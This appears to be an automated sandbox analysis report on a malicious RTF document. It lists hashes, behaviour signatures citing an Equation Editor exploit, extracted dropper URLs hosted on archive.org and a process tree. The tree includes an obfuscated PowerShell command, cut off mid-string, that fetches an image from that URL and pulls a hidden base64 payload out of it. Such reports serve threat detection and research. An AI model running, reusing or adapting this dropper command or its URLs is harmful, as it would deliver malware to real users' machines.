Overview

overview

10

Static

static

1

d9847123b5...a0.rtf

windows7-x64

10

d9847123b5...a0.rtf

windows10-2004-x64

1

Analysis

  • max time kernel
    149s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    08-09-2024 02:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d9847123b526161e5454f0b6ba07218041ccc47e15171972c3d04d681a1bfba0.rtf

  • Size

    81KB

  • MD5

    afb14dcb82dbb041183e8d492c415a13

  • SHA1

    6e75ff4e6d06c9824d9a9b50061d22c21f7d659f

  • SHA256

    d9847123b526161e5454f0b6ba07218041ccc47e15171972c3d04d681a1bfba0

  • SHA512

    f5adb4a97c5d6bc8a8102c70b2bc3f4b05bc5ea1acbeae6457d654510d46cbeb3018880e64c487ebeaee89978827871f951e025220bed25bbddfb1ae5b6e0ac8

  • SSDEEP

    384:Ghvwphf2vHXsv6kBBZK9llGuaPJ4QmwhzofOQT6pLcdYa9eyDAPI/uVOP8d465Q7:Ghxv8LB0MJwwSfOQOO1eyDAA/kdJg

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://archive.org/download/new_image_vbs/new_image_vbs.jpg
exe.dropper

https://archive.org/download/new_image_vbs/new_image_vbs.jpg

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 52 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 62 IoCs
  • Suspicious use of SendNotifyMessage 62 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d9847123b526161e5454f0b6ba07218041ccc47e15171972c3d04d681a1bfba0.rtf"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2892
    • C:\Windows\SysWOW64\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe"
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2940
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2812
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\cutebabygirlwantmetosweetnam.vBS"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⚕ ⛈ ㎯ ⮎ ⍓Bp⚕ ⛈ ㎯ ⮎ ⍓G0⚕ ⛈ ㎯ ⮎ ⍓YQBn⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓VQBy⚕ ⛈ ㎯ ⮎ ⍓Gw⚕ ⛈ ㎯ ⮎ ⍓I⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓9⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓JwBo⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓Bw⚕ ⛈ ㎯ ⮎ ⍓HM⚕ ⛈ ㎯ ⮎ ⍓Og⚕ ⛈ ㎯ ⮎ ⍓v⚕ ⛈ ㎯ ⮎ ⍓C8⚕ ⛈ ㎯ ⮎ ⍓YQBy⚕ ⛈ ㎯ ⮎ ⍓GM⚕ ⛈ ㎯ ⮎ ⍓a⚕ ⛈ ㎯ ⮎ ⍓Bp⚕ ⛈ ㎯ ⮎ ⍓HY⚕ ⛈ ㎯ ⮎ ⍓ZQ⚕ ⛈ ㎯ ⮎ ⍓u⚕ ⛈ ㎯ ⮎ ⍓G8⚕ ⛈ ㎯ ⮎ ⍓cgBn⚕ ⛈ ㎯ ⮎ ⍓C8⚕ ⛈ ㎯ ⮎ ⍓Z⚕ ⛈ ㎯ ⮎ ⍓Bv⚕ ⛈ ㎯ ⮎ ⍓Hc⚕ ⛈ ㎯ ⮎ ⍓bgBs⚕ ⛈ ㎯ ⮎ ⍓G8⚕ ⛈ ㎯ ⮎ ⍓YQBk⚕ ⛈ ㎯ ⮎ ⍓C8⚕ ⛈ ㎯ ⮎ ⍓bgBl⚕ ⛈ ㎯ ⮎ ⍓Hc⚕ ⛈ ㎯ ⮎ ⍓XwBp⚕ ⛈ ㎯ ⮎ ⍓G0⚕ ⛈ ㎯ ⮎ ⍓YQBn⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓XwB2⚕ ⛈ ㎯ ⮎ ⍓GI⚕ ⛈ ㎯ ⮎ ⍓cw⚕ ⛈ ㎯ ⮎ ⍓v⚕ ⛈ ㎯ ⮎ ⍓G4⚕ ⛈ ㎯ ⮎ ⍓ZQB3⚕ ⛈ ㎯ ⮎ ⍓F8⚕ ⛈ ㎯ ⮎ ⍓aQBt⚕ ⛈ ㎯ ⮎ ⍓GE⚕ ⛈ ㎯ ⮎ ⍓ZwBl⚕ ⛈ ㎯ ⮎ ⍓F8⚕ ⛈ ㎯ ⮎ ⍓dgBi⚕ ⛈ ㎯ ⮎ ⍓HM⚕ ⛈ ㎯ ⮎ ⍓LgBq⚕ ⛈ ㎯ ⮎ ⍓H⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓Zw⚕ ⛈ ㎯ ⮎ ⍓n⚕ ⛈ ㎯ ⮎ ⍓Ds⚕ ⛈ ㎯ ⮎ ⍓J⚕ ⛈ ㎯ ⮎ ⍓B3⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓YgBD⚕ ⛈ ㎯ ⮎ ⍓Gw⚕ ⛈ ㎯ ⮎ ⍓aQBl⚕ ⛈ ㎯ ⮎ ⍓G4⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓g⚕ ⛈ ㎯ ⮎ ⍓D0⚕ ⛈ ㎯ ⮎ ⍓I⚕ ⛈ ㎯ ⮎ ⍓BO⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓dw⚕ ⛈ ㎯ ⮎ ⍓t⚕ ⛈ ㎯ ⮎ ⍓E8⚕ ⛈ ㎯ ⮎ ⍓YgBq⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓YwB0⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓UwB5⚕ ⛈ ㎯ ⮎ ⍓HM⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓Bl⚕ ⛈ ㎯ ⮎ ⍓G0⚕ ⛈ ㎯ ⮎ ⍓LgBO⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓u⚕ ⛈ ㎯ ⮎ ⍓Fc⚕ ⛈ ㎯ ⮎ ⍓ZQBi⚕ ⛈ ㎯ ⮎ ⍓EM⚕ ⛈ ㎯ ⮎ ⍓b⚕ ⛈ ㎯ ⮎ ⍓Bp⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓bgB0⚕ ⛈ ㎯ ⮎ ⍓Ds⚕ ⛈ ㎯ ⮎ ⍓J⚕ ⛈ ㎯ ⮎ ⍓Bp⚕ ⛈ ㎯ ⮎ ⍓G0⚕ ⛈ ㎯ ⮎ ⍓YQBn⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓QgB5⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓ZQBz⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓PQ⚕ ⛈ ㎯ ⮎ ⍓g⚕ ⛈ ㎯ ⮎ ⍓CQ⚕ ⛈ ㎯ ⮎ ⍓dwBl⚕ ⛈ ㎯ ⮎ ⍓GI⚕ ⛈ ㎯ ⮎ ⍓QwBs⚕ ⛈ ㎯ ⮎ ⍓Gk⚕ ⛈ ㎯ ⮎ ⍓ZQBu⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓LgBE⚕ ⛈ ㎯ ⮎ ⍓G8⚕ ⛈ ㎯ ⮎ ⍓dwBu⚕ ⛈ ㎯ ⮎ ⍓Gw⚕ ⛈ ㎯ ⮎ ⍓bwBh⚕ ⛈ ㎯ ⮎ ⍓GQ⚕ ⛈ ㎯ ⮎ ⍓R⚕ ⛈ ㎯ ⮎ ⍓Bh⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓YQ⚕ ⛈ ㎯ ⮎ ⍓o⚕ ⛈ ㎯ ⮎ ⍓CQ⚕ ⛈ ㎯ ⮎ ⍓aQBt⚕ ⛈ ㎯ ⮎ ⍓GE⚕ ⛈ ㎯ ⮎ ⍓ZwBl⚕ ⛈ ㎯ ⮎ ⍓FU⚕ ⛈ ㎯ ⮎ ⍓cgBs⚕ ⛈ ㎯ ⮎ ⍓Ck⚕ ⛈ ㎯ ⮎ ⍓Ow⚕ ⛈ ㎯ ⮎ ⍓k⚕ ⛈ ㎯ ⮎ ⍓Gk⚕ ⛈ ㎯ ⮎ ⍓bQBh⚕ ⛈ ㎯ ⮎ ⍓Gc⚕ ⛈ ㎯ ⮎ ⍓ZQBU⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓e⚕ ⛈ ㎯ ⮎ ⍓B0⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓PQ⚕ ⛈ ㎯ ⮎ ⍓g⚕ ⛈ ㎯ ⮎ ⍓Fs⚕ ⛈ ㎯ ⮎ ⍓UwB5⚕ ⛈ ㎯ ⮎ ⍓HM⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓Bl⚕ ⛈ ㎯ ⮎ ⍓G0⚕ ⛈ ㎯ ⮎ ⍓LgBU⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓e⚕ ⛈ ㎯ ⮎ ⍓B0⚕ ⛈ ㎯ ⮎ ⍓C4⚕ ⛈ ㎯ ⮎ ⍓RQBu⚕ ⛈ ㎯ ⮎ ⍓GM⚕ ⛈ ㎯ ⮎ ⍓bwBk⚕ ⛈ ㎯ ⮎ ⍓Gk⚕ ⛈ ㎯ ⮎ ⍓bgBn⚕ ⛈ ㎯ ⮎ ⍓F0⚕ ⛈ ㎯ ⮎ ⍓Og⚕ ⛈ ㎯ ⮎ ⍓6⚕ ⛈ ㎯ ⮎ ⍓FU⚕ ⛈ ㎯ ⮎ ⍓V⚕ ⛈ ㎯ ⮎ ⍓BG⚕ ⛈ ㎯ ⮎ ⍓Dg⚕ ⛈ ㎯ ⮎ ⍓LgBH⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓BT⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓cgBp⚕ ⛈ ㎯ ⮎ ⍓G4⚕ ⛈ ㎯ ⮎ ⍓Zw⚕ ⛈ ㎯ ⮎ ⍓o⚕ ⛈ ㎯ ⮎ ⍓CQ⚕ ⛈ ㎯ ⮎ ⍓aQBt⚕ ⛈ ㎯ ⮎ ⍓GE⚕ ⛈ ㎯ ⮎ ⍓ZwBl⚕ ⛈ ㎯ ⮎ ⍓EI⚕ ⛈ ㎯ ⮎ ⍓eQB0⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓cw⚕ ⛈ ㎯ ⮎ ⍓p⚕ ⛈ ㎯ ⮎ ⍓Ds⚕ ⛈ ㎯ ⮎ ⍓J⚕ ⛈ ㎯ ⮎ ⍓Bz⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓YQBy⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓RgBs⚕ ⛈ ㎯ ⮎ ⍓GE⚕ ⛈ ㎯ ⮎ ⍓Zw⚕ ⛈ ㎯ ⮎ ⍓g⚕ ⛈ ㎯ ⮎ ⍓D0⚕ ⛈ ㎯ ⮎ ⍓I⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓n⚕ ⛈ ㎯ ⮎ ⍓Dw⚕ ⛈ ㎯ ⮎ ⍓P⚕ ⛈ ㎯ ⮎ ⍓BC⚕ ⛈ ㎯ ⮎ ⍓EE⚕ ⛈ ㎯ ⮎ ⍓UwBF⚕ ⛈ ㎯ ⮎ ⍓DY⚕ ⛈ ㎯ ⮎ ⍓N⚕ ⛈ ㎯ ⮎ ⍓Bf⚕ ⛈ ㎯ ⮎ ⍓FM⚕ ⛈ ㎯ ⮎ ⍓V⚕ ⛈ ㎯ ⮎ ⍓BB⚕ ⛈ ㎯ ⮎ ⍓FI⚕ ⛈ ㎯ ⮎ ⍓V⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓+⚕ ⛈ ㎯ ⮎ ⍓D4⚕ ⛈ ㎯ ⮎ ⍓Jw⚕ ⛈ ㎯ ⮎ ⍓7⚕ ⛈ ㎯ ⮎ ⍓CQ⚕ ⛈ ㎯ ⮎ ⍓ZQBu⚕ ⛈ ㎯ ⮎ ⍓GQ⚕ ⛈ ㎯ ⮎ ⍓RgBs⚕ ⛈ ㎯ ⮎ ⍓GE⚕ ⛈ ㎯ ⮎ ⍓Zw⚕ ⛈ ㎯ ⮎ ⍓g⚕ ⛈ ㎯ ⮎ ⍓D0⚕ ⛈ ㎯ ⮎ ⍓I⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓n⚕ ⛈ ㎯ ⮎ ⍓Dw⚕ ⛈ ㎯ ⮎ ⍓P⚕ ⛈ ㎯ ⮎ ⍓BC⚕ ⛈ ㎯ ⮎ ⍓EE⚕ ⛈ ㎯ ⮎ ⍓UwBF⚕ ⛈ ㎯ ⮎ ⍓DY⚕ ⛈ ㎯ ⮎ ⍓N⚕ ⛈ ㎯ ⮎ ⍓Bf⚕ ⛈ ㎯ ⮎ ⍓EU⚕ ⛈ ㎯ ⮎ ⍓TgBE⚕ ⛈ ㎯ ⮎ ⍓D4⚕ ⛈ ㎯ ⮎ ⍓Pg⚕ ⛈ ㎯ ⮎ ⍓n⚕ ⛈ ㎯ ⮎ ⍓Ds⚕ ⛈ ㎯ ⮎ ⍓J⚕ ⛈ ㎯ ⮎ ⍓Bz⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓YQBy⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓SQBu⚕ ⛈ ㎯ ⮎ ⍓GQ⚕ ⛈ ㎯ ⮎ ⍓ZQB4⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓PQ⚕ ⛈ ㎯ ⮎ ⍓g⚕ ⛈ ㎯ ⮎ ⍓CQ⚕ ⛈ ㎯ ⮎ ⍓aQBt⚕ ⛈ ㎯ ⮎ ⍓GE⚕ ⛈ ㎯ ⮎ ⍓ZwBl⚕ ⛈ ㎯ ⮎ ⍓FQ⚕ ⛈ ㎯ ⮎ ⍓ZQB4⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓LgBJ⚕ ⛈ ㎯ ⮎ ⍓G4⚕ ⛈ ㎯ ⮎ ⍓Z⚕ ⛈ ㎯ ⮎ ⍓Bl⚕ ⛈ ㎯ ⮎ ⍓Hg⚕ ⛈ ㎯ ⮎ ⍓TwBm⚕ ⛈ ㎯ ⮎ ⍓Cg⚕ ⛈ ㎯ ⮎ ⍓J⚕ ⛈ ㎯ ⮎ ⍓Bz⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓YQBy⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓RgBs⚕ ⛈ ㎯ ⮎ ⍓GE⚕ ⛈ ㎯ ⮎ ⍓Zw⚕ ⛈ ㎯ ⮎ ⍓p⚕ ⛈ ㎯ ⮎ ⍓Ds⚕ ⛈ ㎯ ⮎ ⍓J⚕ ⛈ ㎯ ⮎ ⍓Bl⚕ ⛈ ㎯ ⮎ ⍓G4⚕ ⛈ ㎯ ⮎ ⍓Z⚕ ⛈ ㎯ ⮎ ⍓BJ⚕ ⛈ ㎯ ⮎ ⍓G4⚕ ⛈ ㎯ ⮎ ⍓Z⚕ ⛈ ㎯ ⮎ ⍓Bl⚕ ⛈ ㎯ ⮎ ⍓Hg⚕ ⛈ ㎯ ⮎ ⍓I⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓9⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓J⚕ ⛈ ㎯ ⮎ ⍓Bp⚕ ⛈ ㎯ ⮎ ⍓G0⚕ ⛈ ㎯ ⮎ ⍓YQBn⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓V⚕ ⛈ ㎯ ⮎ ⍓Bl⚕ ⛈ ㎯ ⮎ ⍓Hg⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓u⚕ ⛈ ㎯ ⮎ ⍓Ek⚕ ⛈ ㎯ ⮎ ⍓bgBk⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓e⚕ ⛈ ㎯ ⮎ ⍓BP⚕ ⛈ ㎯ ⮎ ⍓GY⚕ ⛈ ㎯ ⮎ ⍓K⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓k⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓bgBk⚕ ⛈ ㎯ ⮎ ⍓EY⚕ ⛈ ㎯ ⮎ ⍓b⚕ ⛈ ㎯ ⮎ ⍓Bh⚕ ⛈ ㎯ ⮎ ⍓Gc⚕ ⛈ ㎯ ⮎ ⍓KQ⚕ ⛈ ㎯ ⮎ ⍓7⚕ ⛈ ㎯ ⮎ ⍓CQ⚕ ⛈ ㎯ ⮎ ⍓cwB0⚕ ⛈ ㎯ ⮎ ⍓GE⚕ ⛈ ㎯ ⮎ ⍓cgB0⚕ ⛈ ㎯ ⮎ ⍓Ek⚕ ⛈ ㎯ ⮎ ⍓bgBk⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓e⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓g⚕ ⛈ ㎯ ⮎ ⍓C0⚕ ⛈ ㎯ ⮎ ⍓ZwBl⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓M⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓g⚕ ⛈ ㎯ ⮎ ⍓C0⚕ ⛈ ㎯ ⮎ ⍓YQBu⚕ ⛈ ㎯ ⮎ ⍓GQ⚕ ⛈ ㎯ ⮎ ⍓I⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓k⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓bgBk⚕ ⛈ ㎯ ⮎ ⍓Ek⚕ ⛈ ㎯ ⮎ ⍓bgBk⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓e⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓g⚕ ⛈ ㎯ ⮎ ⍓C0⚕ ⛈ ㎯ ⮎ ⍓ZwB0⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓J⚕ ⛈ ㎯ ⮎ ⍓Bz⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓YQBy⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓SQBu⚕ ⛈ ㎯ ⮎ ⍓GQ⚕ ⛈ ㎯ ⮎ ⍓ZQB4⚕ ⛈ ㎯ ⮎ ⍓Ds⚕ ⛈ ㎯ ⮎ ⍓J⚕ ⛈ ㎯ ⮎ ⍓Bz⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓YQBy⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓SQBu⚕ ⛈ ㎯ ⮎ ⍓GQ⚕ ⛈ ㎯ ⮎ ⍓ZQB4⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓Kw⚕ ⛈ ㎯ ⮎ ⍓9⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓J⚕ ⛈ ㎯ ⮎ ⍓Bz⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓YQBy⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓RgBs⚕ ⛈ ㎯ ⮎ ⍓GE⚕ ⛈ ㎯ ⮎ ⍓Zw⚕ ⛈ ㎯ ⮎ ⍓u⚕ ⛈ ㎯ ⮎ ⍓Ew⚕ ⛈ ㎯ ⮎ ⍓ZQBu⚕ ⛈ ㎯ ⮎ ⍓Gc⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓Bo⚕ ⛈ ㎯ ⮎ ⍓Ds⚕ ⛈ ㎯ ⮎ ⍓J⚕ ⛈ ㎯ ⮎ ⍓Bi⚕ ⛈ ㎯ ⮎ ⍓GE⚕ ⛈ ㎯ ⮎ ⍓cwBl⚕ ⛈ ㎯ ⮎ ⍓DY⚕ ⛈ ㎯ ⮎ ⍓N⚕ ⛈ ㎯ ⮎ ⍓BM⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓bgBn⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓a⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓g⚕ ⛈ ㎯ ⮎ ⍓D0⚕ ⛈ ㎯ ⮎ ⍓I⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓k⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓bgBk⚕ ⛈ ㎯ ⮎ ⍓Ek⚕ ⛈ ㎯ ⮎ ⍓bgBk⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓e⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓g⚕ ⛈ ㎯ ⮎ ⍓C0⚕ ⛈ ㎯ ⮎ ⍓I⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓k⚕ ⛈ ㎯ ⮎ ⍓HM⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓Bh⚕ ⛈ ㎯ ⮎ ⍓HI⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓BJ⚕ ⛈ ㎯ ⮎ ⍓G4⚕ ⛈ ㎯ ⮎ ⍓Z⚕ ⛈ ㎯ ⮎ ⍓Bl⚕ ⛈ ㎯ ⮎ ⍓Hg⚕ ⛈ ㎯ ⮎ ⍓Ow⚕ ⛈ ㎯ ⮎ ⍓k⚕ ⛈ ㎯ ⮎ ⍓GI⚕ ⛈ ㎯ ⮎ ⍓YQBz⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓Ng⚕ ⛈ ㎯ ⮎ ⍓0⚕ ⛈ ㎯ ⮎ ⍓EM⚕ ⛈ ㎯ ⮎ ⍓bwBt⚕ ⛈ ㎯ ⮎ ⍓G0⚕ ⛈ ㎯ ⮎ ⍓YQBu⚕ ⛈ ㎯ ⮎ ⍓GQ⚕ ⛈ ㎯ ⮎ ⍓I⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓9⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓J⚕ ⛈ ㎯ ⮎ ⍓Bp⚕ ⛈ ㎯ ⮎ ⍓G0⚕ ⛈ ㎯ ⮎ ⍓YQBn⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓V⚕ ⛈ ㎯ ⮎ ⍓Bl⚕ ⛈ ㎯ ⮎ ⍓Hg⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓u⚕ ⛈ ㎯ ⮎ ⍓FM⚕ ⛈ ㎯ ⮎ ⍓dQBi⚕ ⛈ ㎯ ⮎ ⍓HM⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓By⚕ ⛈ ㎯ ⮎ ⍓Gk⚕ ⛈ ㎯ ⮎ ⍓bgBn⚕ ⛈ ㎯ ⮎ ⍓Cg⚕ ⛈ ㎯ ⮎ ⍓J⚕ ⛈ ㎯ ⮎ ⍓Bz⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓YQBy⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓SQBu⚕ ⛈ ㎯ ⮎ ⍓GQ⚕ ⛈ ㎯ ⮎ ⍓ZQB4⚕ ⛈ ㎯ ⮎ ⍓Cw⚕ ⛈ ㎯ ⮎ ⍓I⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓k⚕ ⛈ ㎯ ⮎ ⍓GI⚕ ⛈ ㎯ ⮎ ⍓YQBz⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓Ng⚕ ⛈ ㎯ ⮎ ⍓0⚕ ⛈ ㎯ ⮎ ⍓Ew⚕ ⛈ ㎯ ⮎ ⍓ZQBu⚕ ⛈ ㎯ ⮎ ⍓Gc⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓Bo⚕ ⛈ ㎯ ⮎ ⍓Ck⚕ ⛈ ㎯ ⮎ ⍓Ow⚕ ⛈ ㎯ ⮎ ⍓k⚕ ⛈ ㎯ ⮎ ⍓GM⚕ ⛈ ㎯ ⮎ ⍓bwBt⚕ ⛈ ㎯ ⮎ ⍓G0⚕ ⛈ ㎯ ⮎ ⍓YQBu⚕ ⛈ ㎯ ⮎ ⍓GQ⚕ ⛈ ㎯ ⮎ ⍓QgB5⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓ZQBz⚕ ⛈ ㎯ ⮎ ⍓C⚕ 